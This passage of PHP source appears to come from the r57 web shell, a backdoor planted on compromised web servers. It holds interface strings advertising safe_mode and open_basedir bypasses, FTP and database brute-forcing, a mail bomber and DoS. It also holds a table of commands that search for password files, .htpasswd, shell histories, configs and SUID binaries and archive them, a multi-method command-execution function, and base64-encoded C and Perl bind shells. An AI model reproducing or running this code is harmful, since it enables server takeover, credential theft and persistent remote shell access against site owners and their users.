'tr_text62'=>'Dizin Olustur', 'tr_text63'=>'Dosya Sil', 'tr_text64'=>'Dizin Sil', 'tr_text65'=>'Olustur', 'tr_text66'=>'Sil', 'tr_text67'=>'Chown/Chgrp/Chmod', 'tr_text68'=>'Uygula', 'tr_text69'=>'param1', 'tr_text70'=>'param2', 'tr_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", 'tr_text72'=>'Metin Bul', 'tr_text73'=>'Klasor Bul', 'tr_text74'=>'Dosya Bul', 'tr_text75'=>'* you can use regexp', 'tr_text76'=>'Metin Ara Dosyalarin icinde Arama Yoluyla', 'tr_text80'=>'Cesit', 'tr_text81'=>'Net', 'tr_text82'=>'Databases', 'tr_text83'=>'SQL Sorgusu Yap', 'tr_text84'=>'SQL Sorgusu', 'tr_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', 'tr_text86'=>'Download files from server', 'tr_butt14'=>'Download', 'tr_text87'=>'Download files from remote ftp-server', 'tr_text88'=>'server:port', 'tr_text89'=>'File on ftp', 'tr_text90'=>'Transfer mode', 'tr_text91'=>'Archivation', 'tr_text92'=>'without arch.', 'tr_text93'=>'FTP', 'tr_text94'=>'FTP-bruteforce', 'tr_text95'=>'Users list', 'tr_text96'=>'Can\'t get users list', 'tr_text97'=>'checked: ', 'tr_text98'=>'success: ', 'tr_text99'=>'/etc/passwd', 'tr_text100'=>'Send file to remote ftp server', 'tr_text101'=>'Use reverse (user -> resu)', 'tr_text102'=>'Mail', 'tr_text103'=>'Send email', 'tr_text104'=>'Send file to email', 'tr_text105'=>'To', 'tr_text106'=>'From', 'tr_text107'=>'Subj', 'tr_butt15'=>'Send', 'tr_text108'=>'Mail', 'tr_text109'=>'Hide', 'tr_text110'=>'Show', 'tr_text111'=>'SQL-Server : Port', 'tr_text112'=>'Test bypass safe_mode with function mb_send_mail (PHP <= 4.0-4.2.2, 5.x)', 'tr_text113'=>'Test bypass safe_mode, view dir list via imap_list (PHP <= 5.1.2)', 'tr_text114'=>'Test bypass safe_mode, view file contest via imap_body (PHP <= 5.1.2)', 'tr_text115'=>'Test bypass safe_mode, copy file via copy[compress.zlib://] (PHP <= 4.4.2, 5.1.2)', 'tr_text116'=>'Copy from', 'tr_text117'=>'to', 'tr_text118'=>'File copied', 'tr_text119'=>'Cant copy file', 'tr_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST', 'tr_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST', 'tr_text122'=>'Test bypass open_basedir, view dir list via glob (PHP <= 5.2.x)', 'tr_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)', 'tr_text124'=>'Test bypass open_basedir, add data to file via error_log[php://] (PHP <= 5.1.4, 4.4.2)', 'tr_text125'=>'Data', 'tr_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)', 'tr_text127'=>'Test bypass open_basedir, add data to file via readfile[php://] (PHP <= 5.2.1, 4.4.4)', 'tr_text128'=>'Modify/Access date(touch)', 'tr_text129'=>'Test bypass open_basedir, create file via fopen[srpath://] (PHP v5.2.0)', 'tr_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', 'tr_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)', 'tr_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)', 'tr_text133'=>'', 'tr_text134'=>'Database-bruteforce', 'tr_text135'=>'Dictionary', 'tr_text136'=>'Creating evil symlink', 'tr_text137'=>'Useful', 'tr_text138'=>'Dangerous', 'tr_text139'=>'Mail Bomber', 'tr_text140'=>'DoS', 'tr_text141'=>'Danger! Web-daemon crash possible.', 'tr_err0'=>'Error! Can\'t write in file ', 'tr_err1'=>'Error! Can\'t read file ', 'tr_err2'=>'Error! Can\'t create ', 'tr_err3'=>'Error! Can\'t connect to ftp', 'tr_err4'=>'Error! Can\'t login on ftp server', 'tr_err5'=>'Error! Can\'t change dir on ftp', 'tr_err6'=>'Error! Can\'t sent mail', 'tr_err7'=>'Mail send', );
763 $aliases=array( '----------------------------------locate'=>'', 'locate httpd.conf files >> /tmp/grep.txt;
764cat /tmp/grep.txt'=>'locate httpd.conf >> /tmp/grep.txt;
765cat /tmp/grep.txt', 'locate vhosts.conf files >> /tmp/grep.txt;
766cat /tmp/grep.txt'=>'locate vhosts.conf >> /tmp/grep.txt;
767cat /tmp/grep.txt', 'locate proftpd.conf files >> /tmp/grep.txt;
768cat /tmp/grep.txt'=>'locate proftpd.conf >> /tmp/grep.txt;
769cat /tmp/grep.txt', 'locate psybnc.conf >> /tmp/grep.txt;
770cat /tmp/grep.txt'=>'locate psybnc.conf >> /tmp/grep.txt;
771cat /tmp/grep.txt', 'locate my.conf files >> /tmp/grep.txt;
772cat /tmp/grep.txt'=>'locate my.conf >> /tmp/grep.txt;
773cat /tmp/grep.txt', 'locate admin.php files >> /tmp/grep.txt;
774cat /tmp/grep.txt'=>'locate admin.php >> /tmp/grep.txt;
775cat /tmp/grep.txt', 'locate cfg.php files >> /tmp/grep.txt;
776cat /tmp/grep.txt'=>'locate cfg.php >> /tmp/grep.txt;
777cat /tmp/grep.txt', 'locate conf.php files >> /tmp/grep.txt;
778cat /tmp/grep.txt'=>'locate conf.php >> /tmp/grep.txt;
779cat /tmp/grep.txt', 'locate config.dat files >> /tmp/grep.txt;
780cat /tmp/grep.txt'=>'locate config.dat >> /tmp/grep.txt;
781cat /tmp/grep.txt', 'locate config.php files >> /tmp/grep.txt;
782cat /tmp/grep.txt'=>'locate config.php >> /tmp/grep.txt;
783cat /tmp/grep.txt', 'locate config.inc files >> /tmp/grep.txt;
784cat /tmp/grep.txt'=>'locate config.inc >> /tmp/grep.txt;
785cat /tmp/grep.txt', 'locate config.inc.php files >> /tmp/grep.txt;
786cat /tmp/grep.txt'=>'locate config.inc.php >> /tmp/grep.txt;
787cat /tmp/grep.txt', 'locate config.default.php files >> /tmp/grep.txt;
788cat /tmp/grep.txt'=>'locate config.default.php >> /tmp/grep.txt;
789cat /tmp/grep.txt', 'locate .conf files >> /tmp/grep.txt;
790cat /tmp/grep.txt'=>'locate ".conf" >> /tmp/grep.txt;
791cat /tmp/grep.txt', 'locate .pwd files >> /tmp/grep.txt;
792cat /tmp/grep.txt'=>'locate ".pwd" >> /tmp/grep.txt;
793cat /tmp/grep.txt', 'locate .sql files >> /tmp/grep.txt;
794cat /tmp/grep.txt'=>'locate ".sql" >> /tmp/grep.txt;
795cat /tmp/grep.txt', 'locate .htpasswd files >> /tmp/grep.txt;
796cat /tmp/grep.txt'=>'locate ".htpasswd" >> /tmp/grep.txt;
797cat /tmp/grep.txt', 'locate .bash_history files >> /tmp/grep.txt;
798cat /tmp/grep.txt'=>'locate ".bash_history" >> /tmp/grep.txt;
799cat /tmp/grep.txt', 'locate .mysql_history files >> /tmp/grep.txt;
800cat /tmp/grep.txt'=>'locate ".mysql_history" >> /tmp/grep.txt;
801cat /tmp/grep.txt', 'locate backup files >> /tmp/grep.txt;
802cat /tmp/grep.txt'=>'locate backup >> /tmp/grep.txt;
803cat /tmp/grep.txt', 'locate dump files >> /tmp/grep.txt;
804cat /tmp/grep.txt'=>'locate dump >> /tmp/grep.txt;
805cat /tmp/grep.txt', 'locate priv files >> /tmp/grep.txt;
806cat /tmp/grep.txt'=>'locate priv >> /tmp/grep.txt;
807cat /tmp/grep.txt', '----------------------------------tar'=>'', 'tar -czvf all.tgz -T /tmp/grep.txt'=>'tar -czvf all.tgz -T /tmp/grep.txt', '----------------------------------1'=>'', 'locate access_log files >> /tmp/grep.txt;
808cat /tmp/grep.txt'=>'locate access_log >> /tmp/grep.txt;
809cat /tmp/grep.txt', 'locate error_log files >> /tmp/grep.txt;
810cat /tmp/grep.txt'=>'locate error_log >> /tmp/grep.txt;
811cat /tmp/grep.txt', 'locate access.log files >> /tmp/grep.txt;
812cat /tmp/grep.txt'=>'locate access.log >> /tmp/grep.txt;
813cat /tmp/grep.txt', 'locate error.log files >> /tmp/grep.txt;
814cat /tmp/grep.txt'=>'locate error.log >> /tmp/grep.txt;
815cat /tmp/grep.txt', 'locate ".log" files >> /tmp/grep.txt;
816cat /tmp/grep.txt'=>'locate ".log" >> /tmp/grep.txt;
817cat /tmp/grep.txt', '----------------------------------2'=>'', 'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt;
818cat /tmp/grep.txt'=>'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt', '----------------------------------find'=>'', 'find suid files >> /tmp/grep.txt;
819cat /tmp/grep.txt'=>'find / -type f -perm -04000 -ls >> /tmp/grep.txt;
820cat /tmp/grep.txt', 'find suid files in current dir >> /tmp/grep.txt;
821cat /tmp/grep.txt'=>'find . -type f -perm -04000 -ls >> /tmp/grep.txt;
822cat /tmp/grep.txt', 'find sgid files >> /tmp/grep.txt;
823cat /tmp/grep.txt'=>'find / -type f -perm -02000 -ls >> /tmp/grep.txt;
824cat /tmp/grep.txt', 'find sgid files in current dir >> /tmp/grep.txt;
825cat /tmp/grep.txt'=>'find . -type f -perm -02000 -ls >> /tmp/grep.txt;
826cat /tmp/grep.txt', 'find all writable files >> /tmp/grep.txt;
827cat /tmp/grep.txt'=>'find / -type f -perm -2 -ls >> /tmp/grep.txt;
828cat /tmp/grep.txt', 'find all writable files in current dir >> /tmp/grep.txt;
829cat /tmp/grep.txt'=>'find . -type f -perm -2 -ls >> /tmp/grep.txt;
830cat /tmp/grep.txt', 'find all writable directories >> /tmp/grep.txt;
831cat /tmp/grep.txt'=>'find / -type d -perm -2 -ls >> /tmp/grep.txt;
832cat /tmp/grep.txt', 'find all writable directories in current dir >> /tmp/grep.txt;
833cat /tmp/grep.txt'=>'find . -type d -perm -2 -ls >> /tmp/grep.txt;
834cat /tmp/grep.txt', 'find all writable directories and files >> /tmp/grep.txt;
835cat /tmp/grep.txt'=>'find / -perm -2 -ls >> /tmp/grep.txt;
836cat /tmp/grep.txt', 'find all writable directories and files in current dir >> /tmp/grep.txt;
837cat /tmp/grep.txt'=>'find . -perm -2 -ls >> /tmp/grep.txt;
838cat /tmp/grep.txt', 'find all .htpasswd files >> /tmp/grep.txt;
839cat /tmp/grep.txt'=>'find / -type f -name .htpasswd >> /tmp/grep.txt;
840cat /tmp/grep.txt', 'find all .bash_history files >> /tmp/grep.txt;
841cat /tmp/grep.txt'=>'find / -type f -name .bash_history >> /tmp/grep.txt;
842cat /tmp/grep.txt', 'find all .mysql_history files >> /tmp/grep.txt;
843cat /tmp/grep.txt'=>'find / -type f -name .mysql_history >> /tmp/grep.txt;
844cat /tmp/grep.txt', 'find all .fetchmailrc files >> /tmp/grep.txt;
845cat /tmp/grep.txt'=>'find / -type f -name .fetchmailrc >> /tmp/grep.txt;
846cat /tmp/grep.txt', 'find httpd.conf files >> /tmp/grep.txt;
847cat /tmp/grep.txt'=>'find / -type f -name httpd.conf >> /tmp/grep.txt;
848cat /tmp/grep.txt', 'find vhosts.conf files >> /tmp/grep.txt;
849cat /tmp/grep.txt'=>'find / -type f -name vhosts.conf >> /tmp/grep.txt;
850cat /tmp/grep.txt', 'find proftpd.conf files >> /tmp/grep.txt;
851cat /tmp/grep.txt'=>'find / -type f -name proftpd.conf >> /tmp/grep.txt;
852cat /tmp/grep.txt', 'find admin.php files >> /tmp/grep.txt;
853cat /tmp/grep.txt'=>'find / -type f -name admin.php >> /tmp/grep.txt;
854cat /tmp/grep.txt', 'find config* files >> /tmp/grep.txt;
855cat /tmp/grep.txt'=>'find / -type f -name "config*" >> /tmp/grep.txt;
856cat /tmp/grep.txt', 'find cfg.php files >> /tmp/grep.txt;
857cat /tmp/grep.txt'=>'find / -type f -name cfg.php >> /tmp/grep.txt;
858cat /tmp/grep.txt', 'find conf.php files >> /tmp/grep.txt;
859cat /tmp/grep.txt'=>'find / -type f -name conf.php >> /tmp/grep.txt;
860cat /tmp/grep.txt', 'find config.dat files >> /tmp/grep.txt;
861cat /tmp/grep.txt'=>'find / -type f -name config.dat >> /tmp/grep.txt;
862cat /tmp/grep.txt', 'find config.php files >> /tmp/grep.txt;
863cat /tmp/grep.txt'=>'find / -type f -name config.php >> /tmp/grep.txt;
864cat /tmp/grep.txt', 'find config.inc files >> /tmp/grep.txt;
865cat /tmp/grep.txt'=>'find / -type f -name config.inc >> /tmp/grep.txt;
866cat /tmp/grep.txt', 'find config.inc.php files >> /tmp/grep.txt;
867cat /tmp/grep.txt'=>'find / -type f -name config.inc.php >> /tmp/grep.txt;
868cat /tmp/grep.txt', 'find config.default.php files >> /tmp/grep.txt;
869cat /tmp/grep.txt'=>'find / -type f -name config.default.php >> /tmp/grep.txt;
870cat /tmp/grep.txt', 'find *.conf files >> /tmp/grep.txt;
871cat /tmp/grep.txt'=>'find / -type f -name "*.conf" >> /tmp/grep.txt;
872cat /tmp/grep.txt', 'find *.pwd files >> /tmp/grep.txt;
873cat /tmp/grep.txt'=>'find / -type f -name "*.pwd" >> /tmp/grep.txt;
874cat /tmp/grep.txt', 'find *.sql files >> /tmp/grep.txt;
875cat /tmp/grep.txt'=>'find / -type f -name "*.sql" >> /tmp/grep.txt;
876cat /tmp/grep.txt', 'find *backup* files >> /tmp/grep.txt;
877cat /tmp/grep.txt'=>'find / -type f -name "*backup*" >> /tmp/grep.txt;
878cat /tmp/grep.txt', 'find *dump* files >> /tmp/grep.txt;
879cat /tmp/grep.txt'=>'find / -type f -name "*dump*" >> /tmp/grep.txt;
880cat /tmp/grep.txt', '-----------------------------------'=>'', 'find /var/ access_log files >> /tmp/grep.txt;
881cat /tmp/grep.txt'=>'find /var/ -type f -name access_log >> /tmp/grep.txt;
882cat /tmp/grep.txt', 'find /var/ error_log files >> /tmp/grep.txt;
883cat /tmp/grep.txt'=>'find /var/ -type f -name error_log >> /tmp/grep.txt;
884cat /tmp/grep.txt', 'find /var/ access.log files >> /tmp/grep.txt;
885cat /tmp/grep.txt'=>'find /var/ -type f -name access.log >> /tmp/grep.txt;
886cat /tmp/grep.txt', 'find /var/ error.log files >> /tmp/grep.txt;
887cat /tmp/grep.txt'=>'find /var/ -type f -name error.log >> /tmp/grep.txt;
888cat /tmp/grep.txt', 'find /var/ "*.log" files >> /tmp/grep.txt;
889cat /tmp/grep.txt'=>'find /var/ -type f -name "*.log" >> /tmp/grep.txt;
890cat /tmp/grep.txt', '----------------------------------------------------------------------------------------------------'=>'ls -la' );
891 $table_up1 = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b><div align=center>:: ";
892 $table_up2 = " ::</div></b></font></td></tr><tr><td>";
893 $table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333>";
894 $table_end1 = "</td></tr>";
895 $arrow = " <font face=Webdings color=gray>4</font>";
896 $lb = "<font color=green>[</font>";
897 $rb = "<font color=green>]</font>";
898 $font = "<font face=Verdana size=-2>";
899 $ts = "<table class=table1 width=100% align=center>";
900 $te = "</table>";
901 $fs = "<form name=form method=POST>";
902 $fe = "</form>";
903 if(isset($_GET['users'])) { if(!$users=get_users('/etc/passwd')) {echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>";
904} else { echo '<center>';
905 foreach($users as $user) {echo $user."<br>";
906} echo '</center>';
907 } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
908die();
909 } if (!empty($_POST['dir'])) {if(@function_exists('chdir')){@chdir($_POST['dir']);
910}else if(@function_exists('chroot')){@chroot($_POST['dir']);
911};
912} if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();
913};
914}else{$dir=$_POST['dir'];
915} $unix = 0;
916 if(strlen($dir)>1 &&$dir[1]==":") $unix=0;
917else $unix=1;
918 if(empty($dir)) { $os = getenv('OS');
919 if(empty($os)){$os = @php_uname();
920} if(empty($os)){$os ="-";
921$unix=1;
922} else { if(@eregi("^win",$os)) {$unix = 0;
923} else {$unix = 1;
924} } } if(!empty($_POST['s_dir']) &&!empty($_POST['s_text']) &&!empty($_POST['cmd']) &&$_POST['cmd'] == "search_text") { echo $head;
925 if(!empty($_POST['s_mask']) &&!empty($_POST['m'])) {$sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']);
926} else {$sr = new SearchResult($_POST['s_dir'],$_POST['s_text']);
927} $sr->SearchText(0,0);
928 $res = $sr->GetResultFiles();
929 $found = $sr->GetMatchesCount();
930 $titles = $sr->GetTitles();
931 $r = "";
932 if($found >0) { $r .= "<TABLE width=100%>";
933 foreach($res as $file=>$v) { $r .= "<TR>";
934 $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
935 $r .= (!$unix)?str_replace("/","\\",$file) : $file;
936 $r .= "</b></font></ TD>";
937 $r .= "</TR>";
938 foreach($v as $a=>$b) { $r .= "<TR>";
939 $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
940 $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
941 $r .= "</TR>\n";
942 } } $r .= "</TABLE>";
943 echo $r;
944 } else { echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
945 } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
946 die();
947 } if(!$safe_mode &&strpos(ex("echo abcr57"),"r57")!=3) {$safe_mode = 1;
948} $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
949 if(empty($SERVER_SOFTWARE)){$SERVER_SOFTWARE = "-";
950} function ws($i) { return @str_repeat("
951",$i);
952 } function ex($cfe) { $res = '';
953 if (!empty($cfe)) { if(@function_exists('exec')) { @exec($cfe,$res);
954 $res = join("\n",$res);
955 } elseif(@function_exists('shell_exec')) { $res = @shell_exec($cfe);
956 } elseif(@function_exists('system')) { @ob_start();
957 @system($cfe);
958 $res = @ob_get_contents();
959 @ob_end_clean();
960 } elseif(@function_exists('passthru')) { @ob_start();
961 @passthru($cfe);
962 $res = @ob_get_contents();
963 @ob_end_clean();
964 } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = "";
965 if(@function_exists('fread') &&@function_exists('feof')){ while(!@feof($f)) {$res .= @fread($f,1024);
966} }else if(@function_exists('fgets') &&@function_exists('feof')){ while(!@feof($f)) {$res .= @fgets($f,1024);
967} } @pclose($f);
968 } elseif(@is_resource($f = @proc_open($cfe,array(1 =>array("pipe","w")),$pipes))) { $res = "";
969 if(@function_exists('fread') &&@function_exists('feof')){ while(!@feof($pipes[1])) {$res .= @fread($pipes[1],1024);
970} }else if(@function_exists('fgets') &&@function_exists('feof')){ while(!@feof($pipes[1])) {$res .= @fgets($pipes[1],1024);
971} } @proc_close($f);
972 } elseif(@function_exists('pcntl_exec')&&@function_exists('pcntl_fork')) { $res = '[~] Blind Command Execution via [pcntl_exec]\n\n';
973 $pid = @pcntl_fork();
974 if ($pid == -1) { $res .= '[-] Could not children fork. Exit';
975 }else if ($pid) { if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';
976} else {$res .= '[-] Error. Command incorrect.';
977} }else { $cfe = array(" -e 'system(\"$cfe\")'");
978 if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0);
979 if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0);
980 die();
981 } } } return $res;
982 } function get_users($filename) { $users = array();
983 $rows=@explode("\n",readzlib($filename));
984 if(!$rows) return 0;
985 foreach ($rows as $string) { $user = @explode(":",trim($string));
986 if(substr($string,0,1)!='#') array_push($users,$user[0]);
987 } return $users;
988 } function err($n,$txt='') { echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>';
989 echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
990 if(!empty($txt)) {echo " $txt";
991} echo '</b></div></font></td></tr></table>';
992 return null;
993 } function perms($mode) { if (!$GLOBALS['unix']) return 0;
994 if( $mode &0x1000 ) {$type='p';
995} else if( $mode &0x2000 ) {$type='c';
996} else if( $mode &0x4000 ) {$type='d';
997} else if( $mode &0x6000 ) {$type='b';
998} else if( $mode &0x8000 ) {$type='-';
999} else if( $mode &0xA000 ) {$type='l';
1000} else if( $mode &0xC000 ) {$type='s';
1001} else $type='u';
1002 $owner["read"] = ($mode &00400) ?'r': '-';
1003 $owner["write"] = ($mode &00200) ?'w': '-';
1004 $owner["execute"] = ($mode &00100) ?'x': '-';
1005 $group["read"] = ($mode &00040) ?'r': '-';
1006 $group["write"] = ($mode &00020) ?'w': '-';
1007 $group["execute"] = ($mode &00010) ?'x': '-';
1008 $world["read"] = ($mode &00004) ?'r': '-';
1009 $world["write"] = ($mode &00002) ?'w': '-';
1010 $world["execute"] = ($mode &00001) ?'x': '-';
1011 if( $mode &0x800 ) $owner["execute"] = ($owner['execute']=='x') ?'s': 'S';
1012 if( $mode &0x400 ) $group["execute"] = ($group['execute']=='x') ?'s': 'S';
1013 if( $mode &0x200 ) $world["execute"] = ($world['execute']=='x') ?'t': 'T';
1014 $s=sprintf("%1s",$type);
1015 $s.=sprintf("%1s%1s%1s",$owner['read'],$owner['write'],$owner['execute']);
1016 $s.=sprintf("%1s%1s%1s",$group['read'],$group['write'],$group['execute']);
1017 $s.=sprintf("%1s%1s%1s",$world['read'],$world['write'],$world['execute']);
1018 return trim($s);
1019 } function in($type,$name,$size,$value,$checked=0) { $ret = "<input type=".$type." name=".$name." ";
1020 if($size != 0) {$ret .= "size=".$size." ";
1021} $ret .= "value=\"".$value."\"";
1022 if($checked) $ret .= " checked";
1023 return $ret.">";
1024 } function which($pr) { $path = '';
1025 $path = ex("which $pr");
1026 if(!empty($path)) {return $path;
1027}else {return false;
1028} } function cf($fname,$text) { $w_file=@fopen($fname,"w") or @function_exists('file_put_contents') or err(0);
1029 if($w_file) { @fwrite($w_file,@base64_decode($text)) or @fputs($w_file,@base64_decode($text)) or @file_put_contents($fname,@base64_decode($text));
1030 @fclose($w_file);
1031 } } function sr($l,$t1,$t2) { return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
1032 } if (!@function_exists("view_size")) { function view_size($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 ." GB";
1033} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 ." MB";
1034} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 ." KB";
1035} else {$size = $size ." B";
1036} return $size;
1037 } } function DirFilesR($dir,$types='') { $files = Array();
1038 if(($handle = @opendir($dir)) ||(@function_exists('scandir'))) { while ((false !== ($file = @readdir($handle))) &&(false !== ($file = @scandir($dir)))) { if ($file != "."&&$file != "..") { if(@is_dir($dir."/".$file)) $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
1039 else { $pos = @strrpos($file,".");
1040 $ext = @substr($file,$pos,@strlen($file)-$pos);
1041 if($types) { if(@in_array($ext,explode(';
1042',$types))) $files[] = $dir."/".$file;
1043 } else $files[] = $dir."/".$file;
1044 } } } @closedir($handle);
1045 } return $files;
1046 } class SearchResult { var $text;
1047 var $FilesToSearch;
1048 var $ResultFiles;
1049 var $FilesTotal;
1050 var $MatchesCount;
1051 var $FileMatschesCount;
1052 var $TimeStart;
1053 var $TimeTotal;
1054 var $titles;
1055 function SearchResult($dir,$text,$filter='') { $dirs = @explode(";
1056",$dir);
1057 $this->FilesToSearch = Array();
1058 for($a=0;
1059$a<count($dirs);
1060$a++) $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
1061 $this->text = $text;
1062 $this->FilesTotal = @count($this->FilesToSearch);
1063 $this->TimeStart = getmicrotime();
1064 $this->MatchesCount = 0;
1065 $this->ResultFiles = Array();
1066 $this->FileMatchesCount = Array();
1067 $this->titles = Array();
1068 } function GetFilesTotal() {return $this->FilesTotal;
1069} function GetTitles() {return $this->titles;
1070} function GetTimeTotal() {return $this->TimeTotal;
1071} function GetMatchesCount() {return $this->MatchesCount;
1072} function GetFileMatchesCount() {return $this->FileMatchesCount;
1073} function GetResultFiles() {return $this->ResultFiles;
1074} function SearchText($phrase=0,$case=0) { $qq = @explode(' ',$this->text);
1075 $delim = '|';
1076 if($phrase) foreach($qq as $k=>$v) $qq[$k] = '\b'.$v.'\b';
1077 $words = '('.@implode($delim,$qq).')';
1078 $pattern = "/".$words."/";
1079 if(!$case) $pattern .= 'i';
1080 foreach($this->FilesToSearch as $k=>$filename) { $this->FileMatchesCount[$filename] = 0;
1081 $FileStrings = @file($filename) or @next;
1082 for($a=0;
1083$a<@count($FileStrings);
1084$a++) { $count = 0;
1085 $CurString = $FileStrings[$a];
1086 $CurString = @Trim($CurString);
1087 $CurString = @strip_tags($CurString);
1088 $aa = '';
1089 if(($count = @preg_match_all($pattern,$CurString,$aa))) { $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;
1090'><b>\\1</b></SPAN>",$CurString);
1091 $this->ResultFiles[$filename][$a+1] = $CurString;
1092 $this->MatchesCount += $count;
1093 $this->FileMatchesCount[$filename] += $count;
1094 } } } $this->TimeTotal = @round(getmicrotime() -$this->TimeStart,4);
1095 } } function getmicrotime() { list($usec,$sec) = @explode(" ",@microtime());
1096 return ((float)$usec +(float)$sec);
1097 } $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
1098A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
1099GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
1100b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
1101pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
1102NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
1103ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
1104ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
11057DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
11069tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
11072ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
1108dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
1109lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
1110 $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
1111VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
1112JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
1113TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
1114lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
1115Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
